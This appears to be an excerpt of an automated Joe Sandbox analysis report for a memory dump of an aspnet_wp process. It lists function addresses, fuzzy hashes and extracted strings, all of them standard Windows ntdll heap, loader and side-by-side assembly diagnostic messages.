((LONG)FreeEntry->Size > 1), xrefs: 0552E0B3

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 78599186d706710fd5b2f538d626f436c796d49e203e82284efb3460a79068b0
Instruction ID: 24c77f6a308d6d95ae9be2cbc37caff3a32279343611b3321e0910737c7dd884
Opcode Fuzzy Hash: 78599186d706710fd5b2f538d626f436c796d49e203e82284efb3460a79068b0
Instruction Fuzzy Hash: 41420335208741AFC755DF29C484ABABBE6FFC5304F1449AEE4868B391D734E84ACB52

Function 054EB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

DLL %wZ was redirected to %wZ by %s, xrefs: 055383FC
minkernel\ntdll\ldrutil.c, xrefs: 0553840D, 055384E1
LdrpPreprocessDllName, xrefs: 05538403, 055384D7
SxS, xrefs: 055383ED
API set, xrefs: 055383F4, 055383F9
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 055384D0

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: 06ddf0729ab02168997d7ee1e0142ebcab4d98e25faaa2a543b61b09ef327e05
Instruction ID: 05d68cd1ebecab9d2266553bc827f056fd9bb926425f1fcf9736657c6f065416
Opcode Fuzzy Hash: 06ddf0729ab02168997d7ee1e0142ebcab4d98e25faaa2a543b61b09ef327e05
Instruction Fuzzy Hash: 90C14531B04215ABDB29CB64C886BFEBBA6FF45305F1440ABE8469B790EB708D45D391

Function 0557F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON

Download Yara Rule

Strings

Invalid allocation size - %Ix (exceeded %Ix), xrefs: 0557F809
Just allocated block at %p for %Ix bytes, xrefs: 0557F708
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 0557F7BE
RtlAllocateHeap, xrefs: 0557F56D
HEAP[%wZ]: , xrefs: 0557F6E7, 0557F794, 0557F7EB
HEAP: , xrefs: 0557F6F4, 0557F7A1, 0557F7F8

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 0-1745908468
Opcode ID: 1c8f8ae8f0bfeb95e29db574a9d889775d170eea1c5d8bea941eaad1a57ebdd2
Instruction ID: 5eeaa88c456b03744f315122278fe6eb917dab47fd246129a58737b8dd5e58d8
Opcode Fuzzy Hash: 1c8f8ae8f0bfeb95e29db574a9d889775d170eea1c5d8bea941eaad1a57ebdd2
Instruction Fuzzy Hash: 8D916436A00649DFCB11DF69E455AEDBFF2FF89710F18809EE446AB261CB319881CB54

Function 054C645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 055299ED
LdrpInitShimEngine, xrefs: 055299F4, 05529A07, 05529A30
Getting the shim engine exports failed with status 0x%08lx, xrefs: 05529A01
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 05529A2A
minkernel\ntdll\ldrinit.c, xrefs: 05529A11, 05529A3A
apphelp.dll, xrefs: 054C6496

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: c333a6650670d631e043cf5a33c065eff413881eb95a12e0b9b4c2ec00b18495
Instruction ID: 5f52b28451fee25907f4195ec75d82e95dfde339bf341c46d6526598749ff6bf
Opcode Fuzzy Hash: c333a6650670d631e043cf5a33c065eff413881eb95a12e0b9b4c2ec00b18495
Instruction Fuzzy Hash: 3C51C0752183049FE320DF24D846AEB7BE9FB84744F11491FF586972A0DB70E944DB92

Function 05502674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 05542165
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 05542178
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 055421BF
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 05542180
RtlGetAssemblyStorageRoot, xrefs: 05542160, 0554219A, 055421BA
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0554219F

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: b023e9facca23b58d913c9fb8192d7edb331d3dab3f353c459d0c7d7508a6f5b
Instruction ID: 63ebe960548b0771644919060cd5bbed19fbcf412ad71f39eec6d9560e94626d
Opcode Fuzzy Hash: b023e9facca23b58d913c9fb8192d7edb331d3dab3f353c459d0c7d7508a6f5b
Instruction Fuzzy Hash: 9231057AF4022577F721CA95CC49FAE7779FFD4A94F05105ABA05B7280D6B0AA00CAE1

Function 0550C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Loading import redirection DLL: '%wZ', xrefs: 05548170
Unable to build import redirection Table, Status = 0x%x, xrefs: 055481E5
minkernel\ntdll\ldrredirect.c, xrefs: 05548181, 055481F5
minkernel\ntdll\ldrinit.c, xrefs: 0550C6C3
LdrpInitializeProcess, xrefs: 0550C6C4
LdrpInitializeImportRedirection, xrefs: 05548177, 055481EB

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 1a84c740db1422d63b3cf6a03b0ae8d4697508f38744fb24e3ca469f15e06a1a
Instruction ID: e59829c77e4ab3e2bf6efaf5e7e65eb39d53426e405a5ac350c73f959a72a9d2
Opcode Fuzzy Hash: 1a84c740db1422d63b3cf6a03b0ae8d4697508f38744fb24e3ca469f15e06a1a
Instruction Fuzzy Hash: 8F3115717487069FC220EF29DD4AE5ABBE5FFC4B14F010919F9416B290EA60ED04CBA2

Function 054FF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 055402BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 055402E7
RTL: Re-Waiting, xrefs: 0554031E

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 460b12dc3ce599622a03d5174ed758a5af240f5a9da3a8fec1d39a7619771a4e
Instruction ID: a5b2e97e9cdc6912933520e5d9857b86a6211ed496ddd75bfbe2be48831e07a8
Opcode Fuzzy Hash: 460b12dc3ce599622a03d5174ed758a5af240f5a9da3a8fec1d39a7619771a4e
Instruction Fuzzy Hash: 6CE1B270608741AFD725CF68C888B6ABBE1BF84714F240A5EF6558B3E0D774E849CB42

Function 054F51EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

Kernel-MUI-Language-Disallowed, xrefs: 054F5352
Kernel-MUI-Language-SKU, xrefs: 054F542B
Kernel-MUI-Language-Allowed, xrefs: 054F527B
WindowsExcludedProcs, xrefs: 054F522A
Kernel-MUI-Number-Allowed, xrefs: 054F5247

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: e9a82773f3eb971a1abfb641df496158afd348ff53a5a5773dbeb7b228258a71
Instruction ID: ac464f8037b09cdc0627de98efd17f4a88e431e67d69128ebb8376211572a34a
Opcode Fuzzy Hash: e9a82773f3eb971a1abfb641df496158afd348ff53a5a5773dbeb7b228258a71
Instruction Fuzzy Hash: 92F14C72E10229EFCB16DF99C984EEEBBF9FF48650F15405BE506A7210E7709E018B90

Function 054FD7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON

Download Yara Rule

Strings

$, xrefs: 054FD900
LdrShutdownProcess, xrefs: 0553F2CE
minkernel\ntdll\ldrinit.c, xrefs: 0553F2D8
Process 0x%p (%wZ) exiting, xrefs: 0553F2C7
$, xrefs: 054FD86D

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 0-1975516107
Opcode ID: f37d68d0c69c975fea5d884224a984bba79f7fb322cab03751b3a09490d72eab
Instruction ID: 43b9d7b39c818637718e13a09f3c47384b245e8d6c01b801f0a344a0aa2c4bfe
Opcode Fuzzy Hash: f37d68d0c69c975fea5d884224a984bba79f7fb322cab03751b3a09490d72eab
Instruction Fuzzy Hash: D851F171E047499FDB14DFA8D489BEEBFB2BF48304F24415BE5126B280DB74A945DB80

Function 054C76B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

, passed to %s, xrefs: 0552B040
Invalid heap signature for heap at %p, xrefs: 0552B02F
HEAP[%wZ]: , xrefs: 0552B016
HEAP: , xrefs: 0552B023
RtlFreeHeap, xrefs: 0552B03F

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
API String ID: 0-3061284088
Opcode ID: 6597188e215a0f0408fc7d8fd8aa40557fe4232b0f08f076956c8d88a41cb90b
Instruction ID: c0ee92b31697174e354813dfd13791f4b6655874d62a26f6fe1317d66799ab9d
Opcode Fuzzy Hash: 6597188e215a0f0408fc7d8fd8aa40557fe4232b0f08f076956c8d88a41cb90b
Instruction Fuzzy Hash: 2F01D83B218690DED26A9719D41FFE27FE8FB82B30F24409FE4015B591CAA4A884D661

Function 054E70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 054E7C96, 054E8696
HEAP[%wZ]: , xrefs: 054E7C6D, 054E8670
HEAP: , xrefs: 054E7C7C, 054E867F

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: e50aea1472d19f24fa803344e10781cba0681414ada60d0e66b3672616ce7cb8
Instruction ID: 3303c024926c48901c576fc17ff4fe43b80269b9e1b71c1e6e829e3d0d30f1e2
Opcode Fuzzy Hash: e50aea1472d19f24fa803344e10781cba0681414ada60d0e66b3672616ce7cb8
Instruction Fuzzy Hash: 4513B170A04655DFDF29CF68C484BEABBF2FF45315F14819AD846AB381D734A846CB90

Function 054E1070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 05535877
HEAP: , xrefs: 05535884
@, xrefs: 05535A53
!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 0553588F

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 0-3570731704
Opcode ID: f35350e5c991188b3d05c5990efaed719913fcdac631356b8420a673775a1763
Instruction ID: 8ecb7811dbd8d675d5e3098fbce91f275a23dcedef175e25c56e7f07623b6bbd
Opcode Fuzzy Hash: f35350e5c991188b3d05c5990efaed719913fcdac631356b8420a673775a1763
Instruction Fuzzy Hash: D0924871A40229CFEB24CB18CC45FAAB7B6BF45311F1591EAE84AA7350E7309E81CF51

Function 05508402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0550855E
LdrpInitializeProcess, xrefs: 05508422
minkernel\ntdll\ldrinit.c, xrefs: 05508421
@, xrefs: 05508591

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 428ad46fdbd2b5ac4ba0df3ae6acab77f1bdf356eabbdfac6b45e3b57e5dc7e2
Instruction ID: c387ffabaa2cb28e2904718556166546eac5e10875222a9aa0623340eda27d75
Opcode Fuzzy Hash: 428ad46fdbd2b5ac4ba0df3ae6acab77f1bdf356eabbdfac6b45e3b57e5dc7e2
Instruction Fuzzy Hash: 47919C71608745AFE721DF61CD55FABBAE8BF84788F40192EFA8492190E730D904CB66

Function 0550273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 055422B6
.Local, xrefs: 055028D8
SXS: %s() passed the empty activation context, xrefs: 055421DE
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 055421D9, 055422B1

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 312721f5bafcd2bcd424ec7ef40c98b52f65acb1e5ccc117a790ce57d3367cad
Instruction ID: cc4fb4c79516289eb2d6af5944245ad9e865921e5a1545f32ef7e61c988a8e86
Opcode Fuzzy Hash: 312721f5bafcd2bcd424ec7ef40c98b52f65acb1e5ccc117a790ce57d3367cad
Instruction Fuzzy Hash: A7A1A339A04229DBDF25CF54CC88BA9B3B5BF58314F5545EAE809A7291D7309EC1CF90

Function 054D64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 05530FE5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0553106B
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 05531028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 055310AE

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 5d85d3fbfa850d615078bf1f78fdf79d77b3d75b13549099c61296d5388b5601
Instruction ID: 6dcbfc4996d376d61e4cc81ea0b717f13c94a37819bc40f98bf1167c7f846b96
Opcode Fuzzy Hash: 5d85d3fbfa850d615078bf1f78fdf79d77b3d75b13549099c61296d5388b5601
Instruction Fuzzy Hash: 4471C3B15043059FCB20DF54C899F9BBFA9BF857A4F40046AFC498B286D734E589CBA1

Function 054CF626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 0552E3FE
HEAP: , xrefs: 0552E54E
`, xrefs: 0552E428
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0552E563

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 0-2586055223
Opcode ID: ef35a345a63875f5edc68260070bd6b509c3aa679493c966a5c4709931f79292
Instruction ID: 62863d562c70a8e584fa3edbd442c09efab726b2917c8e9eb469fc312cf2415e
Opcode Fuzzy Hash: ef35a345a63875f5edc68260070bd6b509c3aa679493c966a5c4709931f79292
Instruction Fuzzy Hash: B661F436304641AFD712DB24C849FB77BEAFF85714F14089EE9558B291D738E806C7A1

Function 054F15F4 Relevance: 5.2, Strings: 4, Instructions: 166COMMON

Download Yara Rule

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 0553A589
MZER, xrefs: 054F16E8
LdrpCompleteMapModule, xrefs: 0553A590
minkernel\ntdll\ldrmap.c, xrefs: 0553A59A

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$MZER$minkernel\ntdll\ldrmap.c
API String ID: 0-1409021520
Opcode ID: 234e8ae3d1a9c9af1650478c27b84ca5de392aad385f62881903504a1983c3f0
Instruction ID: ce5ff4438ab0e8bd40cec7139f9d10dd5919c1151ee8f573af9ef0afff724b27
Opcode Fuzzy Hash: 234e8ae3d1a9c9af1650478c27b84ca5de392aad385f62881903504a1983c3f0
Instruction Fuzzy Hash: 99512231704745DBEB22CB6CC949FA6B7E6BF40714F1816AAEA969B7E1C770E801C740

Function 055811A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

This is located in the %s field of the heap header., xrefs: 055812D6
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 05581261
HEAP[%wZ]: , xrefs: 0558123D, 055812B7
HEAP: , xrefs: 0558124A, 0558125D, 0558125F, 055812C4

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-336120773
Opcode ID: 2ebb97b9e76f69bd6e135d2582ca46d23fcba6e086bf1c58cefd2c1ddb92d96b
Instruction ID: 418d7786286e1d3f1b099ab1821a2ad128479ef794b489102f473f8f6d433e20
Opcode Fuzzy Hash: 2ebb97b9e76f69bd6e135d2582ca46d23fcba6e086bf1c58cefd2c1ddb92d96b
Instruction Fuzzy Hash: 7531E336204910EFD750EBDAC886FF67BE9FF44620F14009AF843EB291E670A941DB59

Function 054F245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

LdrpDynamicShimModule, xrefs: 0553A998
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0553A992
minkernel\ntdll\ldrinit.c, xrefs: 0553A9A2
apphelp.dll, xrefs: 054F2462

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 8af1c07ea669ba3561360d3b6e973b700007127f8593aa8ac9706eab31776b67
Instruction ID: 9f86c4822f28c729751a9fb2e6d95ace57b2029911bafe010d5323239d95491b
Opcode Fuzzy Hash: 8af1c07ea669ba3561360d3b6e973b700007127f8593aa8ac9706eab31776b67
Instruction Fuzzy Hash: 9B313236610201AFDB20DF58D846EAABFB5FB80B00F26405BF84567240DAB05945E790

Function 054C9148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 0552BAA0, 0552BADD
HEAP: , xrefs: 0552BAAD, 0552BAEA
VirtualQuery Failed 0x%p %x, xrefs: 0552BAF7
VirtualProtect Failed 0x%p %x, xrefs: 0552BABA

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 0-1391187441
Opcode ID: 47367fa9062d1557617a0a655fb9309354e43d6ecbe5a40c421df87e8e70a024
Instruction ID: ffffa28ca41a330de4919aa91368d00ccb952591053659a6108e53f2b6a25f84
Opcode Fuzzy Hash: 47367fa9062d1557617a0a655fb9309354e43d6ecbe5a40c421df87e8e70a024
Instruction Fuzzy Hash: 0A318136600114EFDB51DB55C88AFEABBB9FF85770F14409AE815AB291DB70E940CB60

Function 055794E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON

Download Yara Rule

Strings

, xrefs: 05579AD7
, xrefs: 05579B84
0, xrefs: 05579BF6

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: $ $0
API String ID: 0-3352262554
Opcode ID: 3053e63e4f254f71f9b1c9b7f99d17b98490d756275603632d5bf37c28b8c273
Instruction ID: 61b3515b9e6d25daae32340d4f96906cc88a6ee377de9ecacd46f171345d4592
Opcode Fuzzy Hash: 3053e63e4f254f71f9b1c9b7f99d17b98490d756275603632d5bf37c28b8c273
Instruction Fuzzy Hash: 6E3202B16083858FE720CF68D884B6BFBF5BB88344F04492EF59987250D775E948CB66

Function 054E0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 055350CA
HEAP[%wZ]: , xrefs: 055350AE
HEAP: , xrefs: 055350BD

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 0e4ef67b0a517918f7163d3b8d9338bfb54a697148f248ab88782021418d5bf4
Instruction ID: 2810186e5b9f7271fd03498141c04e7c55d4db7debbe4c7027f8e8fb6492484a
Opcode Fuzzy Hash: 0e4ef67b0a517918f7163d3b8d9338bfb54a697148f248ab88782021418d5bf4
Instruction Fuzzy Hash: AFF17C70700605DFDB15CFA8C899FBAB7B6FF44304F1441AAE46A9B391E774A981CB90

Function 054D1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 054D1728
HEAP[%wZ]: , xrefs: 054D1712
HEAP: , xrefs: 054D1596

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: bcdfb0dd01307ea688839395a4ccbefcb4e9d43e31c1c882c018d5c152a033a3
Instruction ID: bb64acab0184e2485a28df1ec12c10be25762a84d7feec4a5ecb0c7fa8ed15da
Opcode Fuzzy Hash: bcdfb0dd01307ea688839395a4ccbefcb4e9d43e31c1c882c018d5c152a033a3
Instruction Fuzzy Hash: C1E1D230A046559FDB19CF68C4A5BBAFBF2FF45300F18949EE8968B285D734E941CB60

Function 054DB6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON

Download Yara Rule

Strings

MUI, xrefs: 054DB6D8, 054DB7E7
LdrResGetRCConfig Enter, xrefs: 054DB702
LdrResGetRCConfig Exit, xrefs: 054DB714

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
API String ID: 0-1145731471
Opcode ID: f5939276eb1e223f1dbc1ad4c041ac56ecc908bbba6855d21da0ab38022b0c8d
Instruction ID: 86e137a55800a0fb36f2524ec886af22e32b10733fc5a646341898c004d673c3
Opcode Fuzzy Hash: f5939276eb1e223f1dbc1ad4c041ac56ecc908bbba6855d21da0ab38022b0c8d
Instruction Fuzzy Hash: 00B1BF32A096459FCB25CF69C991BAEF7B6FF44714F16492AE456EB390D330E840CB60

Function 0555368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON

Download Yara Rule

Strings

DelegatedNtdll, xrefs: 055536CE
@, xrefs: 0555389F
\SystemRoot\system32\, xrefs: 05553842

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

